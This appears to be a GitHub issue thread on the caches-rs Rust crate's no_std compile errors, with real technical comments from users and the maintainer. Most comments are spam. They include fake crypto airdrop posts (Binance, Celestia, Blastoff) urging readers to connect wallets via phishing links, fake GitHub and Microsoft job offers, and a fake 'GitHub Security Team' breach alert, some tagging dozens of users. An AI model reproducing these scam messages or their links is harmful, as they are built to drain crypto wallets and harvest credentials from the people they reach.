### ISSUE TITLE
no_std compatability

### ISSUE THREAD

**Issue by pantsman0** [al8n/caches-rs#20]
How do you get the crate to compile in no_std environments?

running `cargo check --no-default-features --features hashbrown` give the following error importing `std`:
```bash
error[E0433]: failed to resolve: use of undeclared crate or module `std`
 --> src\lfu\tinylfu\bloom.rs:9:19
  |
9 | const LN_2: f64 = std::f64::consts::LN_2;
  |                   ^^^ use of undeclared crate or module `std`
  |
help: consider importing one of these items
  |
7 + use core::f32::consts;
  |
7 + use core::f64::consts;
  |
help: if you import `consts`, refer to it directly
  |
9 - const LN_2: f64 = std::f64::consts::LN_2;
9 + const LN_2: f64 = consts::LN_2;
  |

error[E0599]: no method named `clone` found for struct `CountMinSketch` in the current scope
   --> src\lfu\tinylfu.rs:156:27
    |
156 |             ctr: self.ctr.clone(),
    |                           ^^^^^ method not found in `CountMinSketch`
    |
   ::: src\lfu\tinylfu\sketch\count_min_sketch_core.rs:16:1
    |
16  | pub(crate) struct CountMinSketch {
    | -------------------------------- method `clone` not found for this struct
    |
    = help: items from traits can only be used if the trait is implemented and in scope
    = note: the following trait defines an item `clone`, perhaps you need to implement it:
            candidate #1: `Clone`

Some errors have detailed explanations: E0433, E0599.
For more information about an error, try `rustc --explain E0433`.
error: could not compile `caches` (lib) due to 2 previous errors```

Running without `--features hashbrown` gives even more errors, enough that my terminal cut of the history.
https://gist.github.com/pantsman0/4d9e0178ba6270ef1e1915c39b1e3e75

**Comment by al8n** [comment]
Hi, please use version `0.2.8`, which fix core compatability.

**Comment by pantsman0** [comment]
@al8n I have implemented the PR as https://github.com/al8n/caches-rs/pull/21. Feel free to pick and choose features you like or dislike.

**Comment by lukesnackcrate** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

**Comment by knofte** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @srw, @iamzhangchao, @dmacewen, @rocflyhi, @Thregren, @killedbymemory, @lingfan

**Comment by lupu2022** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://bit.ly/celestiarewards)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://bit.ly/celestiarewards) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!

**Comment by aatharvauti** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
john-starry, @emilianobonassi, @dennybritz, @ckoopmann, @decay88, @mladen5000, @bujosa, @bt3gl, @ttarsi, @hyz, @akirillo, @irnb, @dawsbot, @wilcollins, @0xramen, @StasKuzichev, @ujvl, @nv0skar, @chopachom, @p7n8zk

**Comment by jddunn** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
KINGGOROV, @distractedm1nd, @modulareum, @sergkulik, @cryptoganesha89, @wiasliaw, @Ozkahraman, @0x6368616e67, @dimascrypto, @tktk4751, @ZhanManthoz, @hadi-moradi, @Bavax83, @zurabak, @hakank07, @HAOYUatHZ, @Emmacanada, @a1300, @ericruleman, @woonet

**Comment by yexuanyang** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
zipper112, @misoobu, @KovacZan, @0x416e746f6e, @canewsin, @adamazad, @0xpanoramix, @heyskylark, @morristai, @MissterHao, @rpopplewell, @lirc571, @EsdrasAmora, @Hmac512, @OGDAO332, @alb13u, @ulasacikel, @nityanantan23, @mustybatz, @aidenfarley

**Comment by tsatke** [comment]
Since this ticket is still open:
I'm still getting the mentioned `ln()`, `powi()`, `ceil()` and additionally `floor()` errors.
I'm on `x86_64-unknown-none` (no_std, alloc), and I'm using the dependency as follows.
`caches = { version = "0.2.8", default-features = false, features = ["hashbrown"] }`
If I don't use the `hashbrown` feature, I get an error because of `extern crate hashbrown`.

The errors I get are:
```
two_queue.rs
No method named `floor` found for type `f64` in the current scope (:194)
No method named `floor` found for type `f64` in the current scope (:195)
No method named `floor` found for type `f64` in the current scope (:364)
No method named `floor` found for type `f64` in the current scope (:365)
bloom.rs
No method named `ln` found for type `f64` in the current scope (:24)
No method named `powi` found for type `f64` in the current scope (:24)
No method named `ceil` found for type `f64` in the current scope (:24)
No method named `ceil` found for type `f64` in the current scope (:25)
```

Is there anything I am missing?

**Comment by machine0083** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
